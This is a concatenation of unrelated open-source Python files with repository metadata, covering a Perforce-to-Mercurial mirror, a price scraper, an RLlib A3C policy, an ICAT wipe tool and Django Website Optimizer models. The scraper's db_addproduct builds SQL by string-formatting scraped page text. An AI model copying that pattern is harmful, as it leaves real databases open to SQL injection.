# Script being really paranoid about local changes....
cmd = "hg purge"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
cmd = "hg pull"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
cmd = "hg update -C -r tip"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
def processChanges(self, changes):
'''
Loop over the changes:
a. sync to the change
b. capture the p4 commit message, user, date and CL#
c. rm everything in tamarin minus .hg/
d. copy everything from p4 clientspace into tamarin MINUS tamarin-merge.txt
e. hg commit using p4 message (append CL# to message), p4 user and p4 date if possible
f. hg push this change (this will make sure that if there is another change available
that for some reason bombs out, we have at least pushed to mozilla what we could)
g. if the push fails....
h. rewrite the external tracking file with this CL#
'''
user=''
changelist=''
desc=''
date=''
for dict in changes:
changelist = dict["change"]
self.log("\nProcessing changelist: %s" % changelist)
#########################################
# a. sync to the change
#########################################
self.log("Sync to the change...")
cmd = "p4 sync %s@%s" % (self.P4AVMPLUS, changelist)
stdout, stderr, exit = self.run_pipe(cmd=cmd, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
#########################################
# b. capture the p4 commit message, user,
# date and CL#
#########################################
cmd = "p4 -G describe -s %s" % (dict["change"])
pipe = Popen( cmd.split(), stdout=PIPE).stdout
try: # The -G option on p4 returns a python object, so need to be loaded via marshal.load()
while 1:
record = marshal.load( pipe )
except EOFError:
pass
pipe.close()
user = record["user"]
date = record["time"]
desc = record["desc"]
cmd = "p4 -G user -o %s" % (user)
pipe = Popen( cmd.split(), stdout=PIPE).stdout
try: # The -G option on p4 returns a python object, so need to be loaded via marshal.load()
while 1:
record = marshal.load( pipe )
except EOFError:
pass
pipe.close()
user = "%s <%s>" % (record["FullName"], record["Email"])
#########################################
# c. rm everything in tamarin minus .hg/
#########################################
self.log("Clean out the mirror repo...")
for filename in os.listdir(self.TAMARIN_REPO):
fullpath = "%s/%s" % (self.TAMARIN_REPO, filename)
if filename != ".hg":
if os.path.isfile(fullpath):
os.unlink(fullpath)
else:
shutil.rmtree(fullpath)
#########################################
# d. copy everything from p4 clientspace into tamarin
#########################################
self.log("Repopulate the mirror repo from p4 workspace...")
for filename in os.listdir(self.P4ROOT):
src = "%s/%s" % (self.P4ROOT, filename)
dest = "%s/%s" % (self.TAMARIN_REPO, filename)
if os.path.isfile(src):
shutil.copy2(src, dest)
else:
shutil.copytree(src, dest)
#########################################
# e. hg commit using p4 message (append CL# to message),
# p4 user and p4 date if possible
#########################################
self.log("Commit the change to the mirror repo...")
commit_message = desc + "\nCL@" + changelist
fd, temp_path = tempfile.mkstemp()
os.write(fd, commit_message)
os.close(fd)
# Massage the date
d = datetime.datetime.fromtimestamp(float(date), pytz.timezone("US/Pacific"))
date = d.strftime("%a %b %d %H:%M:%S %Y %z")
cmd = "hg commit --addremove --user \"%s\" --date \"%s\" --logfile %s" % (user, date, temp_path)
self.log(cmd)
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
# Make sure to remove the temp file
os.unlink(temp_path)
#########################################
# f. hg push this change (this will make sure that if
# there is another change available that for some
# reason bombs out, we have at least pushed to mozilla
# what we could)
#########################################
self.log("Push the change to the mirror repo...")
cmd = "hg push"
stdout, stderr, exit = self.run_pipe(cmd=cmd, cwd=self.TAMARIN_REPO, env=self.env)
for line in stdout:
self.log(line)
#########################################
# g. if the push fails....
#########################################
if stderr:
for line in stderr:
self.log(line)
if exit:
sys.exit(exit)
#########################################
# h. rewrite the external tracking file with this CL#
#########################################
self.log("Update changelist tracking file...")
bf=open(self.LASTBUILD_FILE, 'w')
bf.write(changelist)
bf.close()
self.log("Completed changelist: %s\n\n#########################################" % changelist)
def run_pipe(self, cmd, cwd=None, env=None):
if cwd==None:
cwd=self.script_dir
# run a command and return a tuple of (output, err, exitCode)
if env==None:
process = subprocess.Popen(cmd, cwd=cwd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
process = subprocess.Popen(cmd, cwd=cwd, shell=True, env=env, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
(output, err) = process.communicate()
output = output.split('\n') if output else []
if output and output[-1].strip() == '': # strip empty line at end
output = output[:-1]
exitCode = process.returncode
#process.close()
return (output, err, exitCode)
def log(self, str):
print(str)
if __name__ == "__main__":
f=P4Mirror()
|
keyhom/avm2pluscc_avm2
|
avmplus/build/buildscripts/utils/avm_mirror.py
|
Python
|
unlicense
| 13,613
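The "p4 -G" marshal-reading loop appears twice in the script above; a generic form as a reusable helper (the helper name is ours):
import marshal
from subprocess import Popen, PIPE

def p4_records(cmd):
    """Yield dicts from a 'p4 -G ...' command until the stream is exhausted."""
    pipe = Popen(cmd.split(), stdout=PIPE).stdout
    try:
        while True:
            yield marshal.load(pipe)
    except EOFError:
        pass
    finally:
        pipe.close()

# e.g. changes = list(p4_records("p4 -G changes -s submitted //depot/...@1,100"))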
|
"""
Recently I came across this article: http://habrahabr.ru/post/200190/
and decided to solve the task myself.
Short description of the task, in case the link above breaks:
1. We have a one-dimensional array of non-negative integer heights.
2. If we display this data as a series of walls (one column per value),
how much volume could be filled with imaginary water?
For example, with heights [2, 5, 1, 3, 1, 2, 1, 7, 7, 6], the columns at
indexes 2..6 trap water up to the level of the lower bounding wall
(height 5 at index 1), for a total volume of 17.
My solution is:
1. We move step by step from left to right.
2. If we step down, we push the previous cell value together with the current cell index onto a stack.
3. If we step up, then:
3.1. We pop one value from the stack and flood all cells between the stacked index and the current index up to
floodLevel = min(stackedValue, currentValue).
3.2. We increase the result as follows:
result += (currentStepIndex - stackedIndex) * (min(stackedValue, currentValue) - prevValue)
3.3. We compare currentValue with stackedValue. If currentValue > stackedValue, we pop the next
value from the stack and repeat steps 3.1 - 3.3. If currentValue < stackedValue, we put the stackedValue
with its stackedIndex back onto the stack.
That's all: holes are always filled from the left first, and the highest wall visited so far is
always stored at the bottom of the stack (unless everything has already been filled up to its edge,
in which case the stack is empty).
"""
import random
def generateData():
""" Generates source data for this exercise """
# data = [2, 5, 1, 3, 1, 2, 1, 7, 7, 6]
data = [int(10 * random.random()) for i in xrange(10)]
return data
def calculate(data):
""" Main program algorithm with some debug instruments """
stack = []
result = 0
prevVal = 0
filledCells = {} # for debug purpose only
for col in range(0, len(data)):
val = data[col]
if val < prevVal:
stack.append((col, prevVal))
elif val > prevVal:
while len(stack) > 0 and val > prevVal:
stackItem = stack.pop(-1) if val >= stack[-1][1] else stack[-1]
floodLevel = min(val, stackItem[1])
result += (col - stackItem[0]) * (floodLevel - prevVal)
if __debug__:
for row, cell in [(row, cell) for row in range(prevVal, floodLevel) for cell in range(stackItem[0], col)]:
filledCells[row, cell] = True
display(data, filledCells, col, stack, result)
prevVal = floodLevel
prevVal = val
display(data, filledCells, col, stack, result)
def display(data, filledCells, step, stack, result):
""" Renders current state of program execution in a human readable format """
maxValue = max(data)
colCount = len(data)
valueWidth = len(str(maxValue))
stackHeight = 5
text = ''
for row in range(maxValue + 1, -1, -1):
emptyFill = '_' if row == 0 else ' '
line = ''
line += '|' if data[0] > row else emptyFill # put left side of first column
for col in range(0, colCount):
# fill inner column space
if filledCells.has_key((row, col)): # fill cell with water
line += ('{:' + emptyFill + '^' + str(valueWidth) + '}').format('x')
elif data[col] == row + 1:
line += ('{:' + emptyFill + '>' + str(valueWidth) + '}').format(data[col])
elif data[col] == row:
line += '_' * valueWidth
else:
line += emptyFill * valueWidth
# add right column border
if ((col < colCount - 1 and (data[col] <= row < data[col + 1] or data[col] > row >= data[col + 1]))
or (col == colCount - 1 and data[col] > row)):
line += '|'
elif col < colCount - 1 and data[col] == data[col + 1] == row:
line += '_'
else:
line += emptyFill
text += line + '\n'
# fill bottom row with an indexes of array
for col in range(0, colCount):
text += (' {:>' + str(valueWidth) + '}').format(col)
text += ' \n'
# add current step indicator
for col in range(0, colCount):
text += (' {:^' + str(valueWidth) + '}').format('^' if col == step else ' ')
text += " \n"
# render stack
text += '\nstack:\n'
colIndexWidth = len(str(len(data)))
for row in range(max(len(stack), stackHeight), -1, -1):
if row >= len(stack):
text += '[' + (' ' * (colIndexWidth + valueWidth + 4)) + ']\n'
elif row == 0:
text += ('[_{0:_>' + str(colIndexWidth) + '},_{1:_>' + str(valueWidth) + '}_]\n').format(stack[row][1], stack[row][0])
else:
text += ('[ {0:>' + str(colIndexWidth) + '}, {1:>' + str(valueWidth) + '} ]\n').format(stack[row][1], stack[row][0])
# render sum
text += '\nresult = {0}'.format(result)
print text
if __name__ == '__main__':
data = generateData()
calculate(data)
|
tigeral/polygon
|
python/habra_task/habratask_main.py
|
Python
|
unlicense
| 5,696
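An independent cross-check of the example volume from the docstring, using the classic prefix/suffix-maxima method rather than the stack; the function name is ours and the test data mirrors the snippet:
def trapped_volume(heights):
    right_max = []
    m = 0
    for h in reversed(heights):
        m = max(m, h)
        right_max.append(m)
    right_max.reverse()
    total = 0
    left_max = 0
    for i, h in enumerate(heights):
        left_max = max(left_max, h)
        total += min(left_max, right_max[i]) - h
    return total

assert trapped_volume([2, 5, 1, 3, 1, 2, 1, 7, 7, 6]) == 17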
|
# encoding: utf-8
'''
Created on 2015年3月15日
@author: Sunday
'''
from twisted.web.resource import Resource
root = Resource()
if __name__ == '__main__':
pass
else:
__all__ = ['factory', ]
|
alexsunday/pyvpn
|
src/webconsole.py
|
Python
|
unlicense
| 217
|
#!/usr/bin/python
# coding: utf-8
try:
from bs4 import BeautifulSoup
import ConfigParser as cp
import requests, re, sys
import MySQLdb as sql
except ImportError:
print "Error importing modules, exiting."
exit()
# Import database credentials from secured config file
config = cp.RawConfigParser()
config.read('/var/www-secret/config.ini')
db_user = config.get('database','username')
db_pass = config.get('database','password')
db_name = config.get('database','database')
# Open database connection
db = sql.connect("localhost",db_user,db_pass,db_name)
# prepare db cursor
cursor = db.cursor()
def db_getproducts():
# List of product URLs to scan prices for. Supports Heureka.cz only.
# gets list of products, each item is (id,url)
cursor.execute("SELECT id,code,name FROM products")
products = cursor.fetchall()
return products
def db_getshops():
# This version of beta uses the shop_link table, allowing each product to use different shops
BETA_args = """
SELECT shops.code
FROM shops
LEFT JOIN shop_link
ON shops.id = shop_link.shop_id
WHERE shop_link.product_id = ???
"""
# For now, lets use all shops for all products.
args = """
SELECT id,code
FROM shops
"""
cursor.execute(args)
shops = cursor.fetchall()
print "Shops from DB: ", shops
return shops
# Scraping function scans the product pages and collects prices for shops listed in the DB.
# Returns a list of (product_id, shop_id, price) tuples ready for DB insertion.
def db_getprices(products):
results = [] # Setup empty list where dictionaries of products will be stored
results_sql = []
db_shops = db_getshops()
# Product/URL loop
for product in products:
shops = list(db_shops)
# Get list of shops
# shops = db_getshops()
# Get html data from products page
url = product[1] + "?expand=1#!o=4"
html = requests.get(url).text
soup = BeautifulSoup(html, 'html.parser')
# Get fancy product name
item_name = soup.h1.string
# Find button with price and shop name code
items = soup.select("a.pricen")
# RESULTS = [{productA:[{shopA1:priceA1},{shopA2:priceA2}]},{productB:[{shopB1:priceB1},{shopB2:priceB2}]}]
prices = {}
result = { item_name : prices }
# Go through each buy button, check if link is in shop list, convert price to int, append to results.
for item in items:
for shop in shops:
if shop[1] in item.get('href'):
shops.pop(shops.index(shop))
price = re.sub("[^0-9]","",item.text)
# product ID, shop ID, date, price
result = (product[0],shop[0],price)
results_sql.append(result)
return results_sql
def db_insertprices(data):
# Prepare general statement for inserting data from the array
stmt = """
INSERT INTO prices(product_id, shop_id, date, price)
VALUES (%s,%s,CURDATE(),%s)
"""
# Try to insert data into DB
try:
print data
cursor.executemany(stmt, data)
db.commit()
print "New prices successfuly inserted into database"
except:
db.rollback()
def db_addproduct(url):
# Add a new product to the list by passing its Heureka URL.
# Get html data from url and parse it
html = requests.get(url).text
soup = BeautifulSoup(html, 'html.parser')
# Get fancy product name
item_name = soup.h1.string
# Get current products to check if already exists
product = [product[2] for product in db_getproducts()]
if item_name in product:
print "This product is already in the list"
return
# If it isnt, lets continue
sql = """
INSERT INTO products(code,name)
VALUES ("%s", "%s")
""" % (url, item_name)
# Try to execute and commit
try:
cursor.execute(sql)
db.commit()
except: # Rollback if shit hits the fan
db.rollback()
print "%s has been added." % item_name
return
def cron():
# Get prices for products for all shops
data = db_getprices(db_getproducts())
# Insert prices into DB
db_insertprices(data)
def add_product():
db_addproduct(sys.argv[2])
def help():
print """
core.py [option] [arg]
[option]:
add_product - Add new product, requires [arg] with URL of Heureka page
cron - Cron task to get prices and insert them into DB
dev - Runs a test scrape, prints prices to terminal only.
"""
def dev():
data = db_getproducts()
print data
data2 = db_getprices(data)
print data2
if __name__ == '__main__':
globals()[sys.argv[1]]()
#new_product = str(raw_input("Heureka URL:"))
#db_addproduct(new_product)
|
vkotek/PriceDog
|
core.py
|
Python
|
unlicense
| 4,867
|
from ctypes import cdll
lib = cdll.LoadLibrary("target/release/libembed.dylib")
lib.process()
print("done!")
|
amitsaha/learning
|
rust/embed/embed.py
|
Python
|
unlicense
| 112
|
"""Note: Keep in sync with changes to VTraceTFPolicy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ray
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.explained_variance import explained_variance
from ray.rllib.evaluation.postprocessing import compute_advantages, \
Postprocessing
from ray.rllib.policy.tf_policy_template import build_tf_policy
from ray.rllib.policy.tf_policy import LearningRateSchedule
from ray.rllib.utils import try_import_tf
tf = try_import_tf()
class A3CLoss(object):
def __init__(self,
action_dist,
actions,
advantages,
v_target,
vf,
vf_loss_coeff=0.5,
entropy_coeff=0.01):
log_prob = action_dist.logp(actions)
# The "policy gradients" loss
self.pi_loss = -tf.reduce_sum(log_prob * advantages)
delta = vf - v_target
self.vf_loss = 0.5 * tf.reduce_sum(tf.square(delta))
self.entropy = tf.reduce_sum(action_dist.entropy())
self.total_loss = (self.pi_loss + self.vf_loss * vf_loss_coeff -
self.entropy * entropy_coeff)
def actor_critic_loss(policy, batch_tensors):
policy.loss = A3CLoss(
policy.action_dist, batch_tensors[SampleBatch.ACTIONS],
batch_tensors[Postprocessing.ADVANTAGES],
batch_tensors[Postprocessing.VALUE_TARGETS],
policy.convert_to_eager(policy.vf), policy.config["vf_loss_coeff"],
policy.config["entropy_coeff"])
return policy.loss.total_loss
def postprocess_advantages(policy,
sample_batch,
other_agent_batches=None,
episode=None):
completed = sample_batch[SampleBatch.DONES][-1]
if completed:
last_r = 0.0
else:
next_state = []
for i in range(len(policy.model.state_in)):
next_state.append([sample_batch["state_out_{}".format(i)][-1]])
last_r = policy._value(sample_batch[SampleBatch.NEXT_OBS][-1],
sample_batch[SampleBatch.ACTIONS][-1],
sample_batch[SampleBatch.REWARDS][-1],
*next_state)
return compute_advantages(sample_batch, last_r, policy.config["gamma"],
policy.config["lambda"])
def add_value_function_fetch(policy):
return {SampleBatch.VF_PREDS: policy.vf}
class ValueNetworkMixin(object):
def __init__(self):
self.vf = self.model.value_function()
def _value(self, ob, prev_action, prev_reward, *args):
feed_dict = {
self.get_placeholder(SampleBatch.CUR_OBS): [ob],
self.get_placeholder(SampleBatch.PREV_ACTIONS): [prev_action],
self.get_placeholder(SampleBatch.PREV_REWARDS): [prev_reward],
self.model.seq_lens: [1]
}
assert len(args) == len(self.model.state_in), \
(args, self.model.state_in)
for k, v in zip(self.model.state_in, args):
feed_dict[k] = v
vf = self.get_session().run(self.vf, feed_dict)
return vf[0]
def stats(policy, batch_tensors):
return {
"cur_lr": tf.cast(policy.cur_lr, tf.float64),
"policy_loss": policy.loss.pi_loss,
"policy_entropy": policy.loss.entropy,
"var_gnorm": tf.global_norm(policy.var_list),
"vf_loss": policy.loss.vf_loss,
}
def grad_stats(policy, grads):
return {
"grad_gnorm": tf.global_norm(grads),
"vf_explained_var": explained_variance(
policy.get_placeholder(Postprocessing.VALUE_TARGETS), policy.vf),
}
def clip_gradients(policy, optimizer, loss):
grads = tf.gradients(loss, policy.var_list)
grads, _ = tf.clip_by_global_norm(grads, policy.config["grad_clip"])
clipped_grads = list(zip(grads, policy.var_list))
return clipped_grads
def setup_mixins(policy, obs_space, action_space, config):
ValueNetworkMixin.__init__(policy)
LearningRateSchedule.__init__(policy, config["lr"], config["lr_schedule"])
policy.var_list = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,
tf.get_variable_scope().name)
A3CTFPolicy = build_tf_policy(
name="A3CTFPolicy",
get_default_config=lambda: ray.rllib.agents.a3c.a3c.DEFAULT_CONFIG,
loss_fn=actor_critic_loss,
stats_fn=stats,
grad_stats_fn=grad_stats,
gradients_fn=clip_gradients,
postprocess_fn=postprocess_advantages,
extra_action_fetches_fn=add_value_function_fetch,
before_loss_init=setup_mixins,
mixins=[ValueNetworkMixin, LearningRateSchedule])
|
atumanov/ray
|
python/ray/rllib/agents/a3c/a3c_tf_policy.py
|
Python
|
apache-2.0
| 4,762
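A toy numeric illustration of how A3CLoss combines its three terms, using plain NumPy instead of TensorFlow; all numbers are made up, and the coefficients match the defaults above (vf_loss_coeff=0.5, entropy_coeff=0.01):
import numpy as np

log_prob = np.array([-0.5, -1.2])
advantages = np.array([1.0, -0.5])
vf = np.array([0.9, 0.4])
v_target = np.array([1.0, 0.0])
entropy = np.array([0.7, 0.6])

pi_loss = -np.sum(log_prob * advantages)           # policy-gradient term
vf_loss = 0.5 * np.sum(np.square(vf - v_target))   # value-function term
total = pi_loss + 0.5 * vf_loss - 0.01 * np.sum(entropy)
print(total)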
|
#! /usr/bin/python
#
# Delete all content from an ICAT.
#
# This is surprisingly involved to do it reliably. See the comments
# below for the issues that need to be taken into account.
import logging
import time
from warnings import warn
import icat
import icat.config
from icat.ids import DataSelection
from icat.query import Query
logging.basicConfig(level=logging.INFO)
config = icat.config.Config(ids="optional")
client, conf = config.getconfig()
if client.apiversion < '4.3.0':
raise RuntimeError("Sorry, icat.server version %s is too old, "
"need 4.3.0 or newer." % client.apiversion)
if client.ids and client.ids.apiversion < '1.6.0':
warn("ids.server %s is older then the recommended minimal version 1.6.0."
% client.ids.apiversion)
client.login(conf.auth, conf.credentials)
# Limit of the number of objects to be dealt with at a time.
objlimit = 200
def deleteobjs(query):
"""Delete all objects of matching the query.
"""
query.setLimit( (0, objlimit) )
while True:
objs = client.search(query)
if not objs:
break
# Deleting Study on ICAT 4.4.0 throws ICATInternalError. The
# deletion succeeds though, at least, the Study object is gone
# afterwards. This seems to be fixed in recent ICAT versions.
# As a work around, just ignore ICATInternalError here.
try:
client.deleteMany(objs)
except icat.ICATInternalError:
pass
# First step, delete all Datafiles.
#
# This is somewhat tricky: if the Datafile has been created with IDS
# by a file upload then we MUST delete it with IDS, otherwise it would
# leave an orphan file in the storage. If the Datafile has been
# created directly in the ICAT without IDS, we cannot delete it with
# IDS, because IDS will not find the actual file and will throw a
# server error. But there is no reliable way to tell the one from the
# other. As a rule, we will assume that the file has been created
# with IDS if the location attribute is set.
# Delete all datafiles having location not set directly from ICAT
# first, because they would cause trouble when we try to delete the
# remaining datafiles from IDS, see Issue icatproject/ids.server#63.
deleteobjs(Query(client, "Datafile", conditions={"location": "IS NULL"}))
# To delete datafiles from IDS, we must restore the datasets first,
# because IDS can only delete datafiles that are online. But
# restoring one dataset may cause another one to get archived if free
# main storage is low. So we might need several sweeps to get
# everything deleted. In each sweep, we delete everything that is
# currently online in a first step and file a restore request for some
# remaining datasets in a second step.
#
# Restoring a dataset may fail, in particular, if the files are not
# present in IDS storage, see above. If that happens, we reset the
# error to retry. But we do that only once per dataset. If the
# restore fails again, we give up and delete the dataset from ICAT,
# without considering IDS.
if client.ids:
dfquery = Query(client, "Datafile",
conditions={"location": "IS NOT NULL"}, limit=(0, 1))
retriedDatasets = set()
while True:
deleteDatasets = []
restoreDatasets = []
errorDatasets = []
failedDatasets = []
for ds in client.searchChunked("Dataset", chunksize=objlimit):
try:
status = client.ids.getStatus(DataSelection([ds]))
except icat.IDSInternalError:
if ds in retriedDatasets:
failedDatasets.append(ds)
else:
errorDatasets.append(ds)
continue
if status == "ONLINE":
deleteDatasets.append(ds)
if len(deleteDatasets) >= objlimit:
client.deleteData(deleteDatasets)
client.deleteMany(deleteDatasets)
deleteDatasets = []
elif status == "ARCHIVED":
if len(restoreDatasets) < objlimit:
restoreDatasets.append(ds)
if len(deleteDatasets) > 0:
client.deleteData(deleteDatasets)
client.deleteMany(deleteDatasets)
if len(restoreDatasets) > 0:
client.ids.restore(DataSelection(restoreDatasets))
if len(failedDatasets) > 0:
client.deleteMany(failedDatasets)
retriedDatasets.difference_update(failedDatasets)
if len(errorDatasets) > 0:
client.ids.reset(DataSelection(errorDatasets))
retriedDatasets.update(errorDatasets)
# This whole loop may take a significant amount of time, make
# sure our session does not time out.
client.autoRefresh()
# If any Datafile is left we need to continue the loop.
if client.search(dfquery):
time.sleep(60)
else:
break
# Second step, delete most content from ICAT.
#
# In theory, this could be done by just deleting the Facilities. By
# cascading, this would already wipe almost everything. Practical
# experience shows that the object tree related to a single facility
# may be too large to be deleted in one single run, resulting in
# strange errors from the database backend. Thus, we start little by
# little, deleting all Investigations individually first. This
# already removes a major part of all content. Then we delete the
# Facilities which removes most of the rest by cascading. Finally we
# go for all the remaining bits, not related to a facility, such as
# DataCollection and Study.
#
# But we must take care not to delete the authz tables now, because
# with old ICAT versions before 4.4.0, the root user has only
# unconditional write access to the authz tables. For the other
# stuff, he needs a rule in place that allows him access. If we
# remove the authz tables too early, we may take away delete
# permission from ourselves.
authztables = [ "Grouping", "Rule", "User", "UserGroup", ]
alltables = client.getEntityNames()
tables = ["Investigation", "Facility"] + list(set(alltables) - set(authztables))
for t in tables:
deleteobjs(Query(client, t))
# Last step, delete the authztables.
for t in authztables:
deleteobjs(Query(client, t))
|
icatproject/python-icat
|
wipeicat.py
|
Python
|
apache-2.0
| 6,331
|
from django.db import models
import settings
AUTO_PRUNE_MODES = (
('None', 'None'),
('Conservative', 'Conservative'),
('Normal', 'Normal'),
('Aggressive', 'Aggressive'),
)
class GwoExperiment(models.Model):
"""An experiment or test in Google Website Optimizer"""
title = models.CharField(max_length=100)
experiment_id = models.IntegerField(
"GWO Experiment ID",
blank=True,
null=True,
help_text="This is the ID assigned by Google Website Optimizer.",
)
experiment_type = models.CharField(choices=(('AB', 'A/B Test'), ('Multivariate', 'Multivariate')), max_length=15)
control_script = models.TextField(blank=True)
tracking_script = models.TextField(blank=True)
conversion_script = models.TextField(blank=True)
status = models.CharField(default='New', max_length=10, blank=True)
auto_prune_mode = models.CharField(choices=AUTO_PRUNE_MODES, max_length=15, default='None')
test_url = models.URLField(
verbose_name="Test page URL",
verify_exists=False,
max_length=255,
help_text="When testing dynamic pages, select use a URL that uses the template being tested"
)
goal_url = models.URLField(
verbose_name="Coversion page URL",
verify_exists=False,
max_length=255,
help_text="This can be the same as the testing URL. You can trigger a 'conversion' via JavaScript."
)
report_url = models.URLField(max_length=255, blank=True)
configuration_url = models.URLField(max_length=255, blank=True)
class Meta:
pass
def __unicode__(self):
return self.title
@property
def gwo_url(self):
"""
Return the URL represented by the GwoExperimentQuery
"""
from websiteoptimizer import client
return client.ExperimentQuery(self.experiment_id)
def _sync_gwo_experiment(self):
"""
Automatically called by the save method
"""
from websiteoptimizer import client
gwo_client = client.WebsiteOptimizerClient()
gwo_client.ClientLogin(settings.GWO_USER, settings.GWO_PASSWORD, 'django-gwo')
if self.experiment_id:
exp = gwo_client.get_experiment(self.gwo_url)
exp.title.text = self.title
# Google doesn't like it if we change the auto_prune_mode
# exp.auto_prune_mode.text = self.auto_prune_mode
exp.update_test_link = self.test_url
exp.update_goal_link = self.goal_url
exp = gwo_client.update(exp, force=True)
else:
exp = gwo_client.add_experiment(
exp_type=self.experiment_type,
analytics_acct=settings.GWO_ACCOUNT,
test_url=self.test_url,
goal_url=self.goal_url,
title=self.title,
)
self.experiment_id = exp.experiment_id.text
self.control_script = exp.control_script.text
self.tracking_script = exp.tracking_script.text
self.conversion_script = exp.conversion_script.text
self.status = exp.status.text
# self.report_url = exp.report_url.text
# self.configuration_url = exp.configuration_url.text
def save(self, *args, **kwargs):
"""
Sync with Google Website Optimizer
The local_only=True keyword argument will prevent syncing the item with
Google Website Optimizer's API
"""
if not kwargs.pop('local_only', False):
self._sync_gwo_experiment()
super(GwoExperiment, self).save(*args, **kwargs)
class GwoAbPageVariation(models.Model):
"""
A Page Variation in an A/B Experiment
"""
gwo_experiment = models.ForeignKey(
GwoExperiment,
verbose_name="Experiment",
limit_choices_to={'experiment_type':'AB'})
appagevariation_id = models.IntegerField(
"GWO AB Page Variation ID",
blank=True,
null=True,
help_text="This is the ID assigned by Google Website Optimizer.",
)
title = models.CharField(max_length=100)
content = models.URLField("Page URL", verify_exists=False)
class Meta:
pass
def __unicode__(self):
return self.title
class GwoSection(models.Model):
"""
A section within a multivariate GWO experiment
"""
gwo_experiment = models.ForeignKey(
GwoExperiment,
verbose_name="Experiment",
limit_choices_to={'experiment_type': 'Multivariate'})
section_id = models.IntegerField(
"GWO Section ID",
blank=True,
null=True,
help_text="This is the ID assigned by Google Website Optimizer.",
)
title = models.CharField(max_length=100)
begin_script = models.CharField(blank=True, max_length=255)
end_script = models.CharField(blank=True, max_length=255)
class Meta:
pass
def __unicode__(self):
return u"%s Section: %s" % (self.gwo_experiment, self.title)
@property
def gwo_url(self):
"""
Return the URL represented by the GwoExperimentQuery
"""
from websiteoptimizer import client
return client.SectionQuery(
self.gwo_experiment.experiment_id,
self.section_id
)
def _sync_gwo_section(self):
"""
Automatically called by the save method
"""
if self.gwo_experiment is None:
return
from websiteoptimizer import client
gwo_client = client.WebsiteOptimizerClient()
gwo_client.ClientLogin(settings.GWO_USER, settings.GWO_PASSWORD, 'django-gwo')
if self.section_id:
sec = gwo_client.get_section(self.gwo_url)
sec.title.text = self.title
sec = gwo_client.update(sec, force=True)
else:
sec = gwo_client.add_section(
self.gwo_experiment.experiment_id,
title=self.title,
)
self.section_id = sec.section_id.text
self.begin_script = sec.section_begin_script.text
self.end_script = sec.section_end_script.text
def save(self, *args, **kwargs):
"""
Sync with Google Website Optimizer
The local_only=True keyword argument will prevent syncing the item with
Google Website Optimizer's API
"""
if not kwargs.pop('local_only', False):
self._sync_gwo_section()
super(GwoSection, self).save(*args, **kwargs)
class GwoVariation(models.Model):
"""
A variation of a section within a multivariate experiment
"""
gwo_experiment = models.ForeignKey(GwoExperiment)
gwo_section = models.ForeignKey(GwoSection)
variation_id = models.IntegerField(
"GWO Variation ID",
blank=True,
null=True,
help_text="This is the ID assigned by Google Website Optimizer.",
)
title = models.CharField(max_length=100)
content = models.TextField(blank=True)
class Meta:
pass
def __unicode__(self):
return u"%s Variation: %s" % (self.gwo_section, self.title)
@property
def gwo_url(self):
"""
Return the URL represented by the GwoExperimentQuery
"""
from websiteoptimizer import client
return client.VariationQuery(
self.gwo_experiment.experiment_id,
self.gwo_section.section_id,
self.variation_id
)
def _sync_gwo_variation(self):
"""
Automatically called by the save method
"""
from websiteoptimizer import client
gwo_client = client.WebsiteOptimizerClient()
gwo_client.ClientLogin(settings.GWO_USER, settings.GWO_PASSWORD, 'django-gwo')
if self.variation_id:
var = gwo_client.get_variation(self.gwo_url)
var.title.text = self.title
var.content.text = self.content
gwo_client.update(var, force=True)
else:
var = gwo_client.add_variation(
self.gwo_section.gwo_url,
title=self.title,
content=self.content
)
self.variation_id = var.variation_id.text
def save(self, *args, **kwargs):
"""
Sync with Google Website Optimizer
The local_only=True keyword argument will prevent syncing the item with
Google Website Optimizer's API
"""
from django.core.exceptions import ValidationError
if self.gwo_experiment != self.gwo_section.gwo_experiment:
raise ValidationError("The experiment and the section don't go together!")
if not kwargs.pop('local_only', False):
self._sync_gwo_variation()
super(GwoVariation, self).save(*args, **kwargs)
def handle_delete(sender, instance, **kwargs):
"""
Send out a delete to GWO
"""
from websiteoptimizer import client
gwo_client = client.WebsiteOptimizerClient()
gwo_client.ClientLogin(settings.GWO_USER, settings.GWO_PASSWORD, 'django-gwo')
gwo_client.delete(instance.gwo_url)
# from django.db.models.signals import pre_delete
# pre_delete.connect(handle_delete, sender=GwoExperiment)
# pre_delete.connect(handle_delete, sender=GwoSection)
# pre_delete.connect(handle_delete, sender=GwoVariation)
|
callowayproject/django-gwo
|
gwo/models.py
|
Python
|
apache-2.0
| 9,424
|
#!/usr/bin/env python
# Copyright 2015 Stanford University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#from spy_state import *
from spy_analysis import *
import sys, re
# All of these calls are based on the print statements in legion_logging.h
prefix = "\[(?P<node>[0-9]+) - (?P<thread>[0-9a-f]+)\] \{\w+\}\{legion_spy\}: "
prefix_pat = re.compile(prefix)
# Logger calls for the shape of the machine
utility_pat = re.compile(prefix+"Utility (?P<pid>[0-9a-f]+)")
processor_pat = re.compile(prefix+"Processor (?P<pid>[0-9a-f]+) (?P<kind>[0-9]+)")
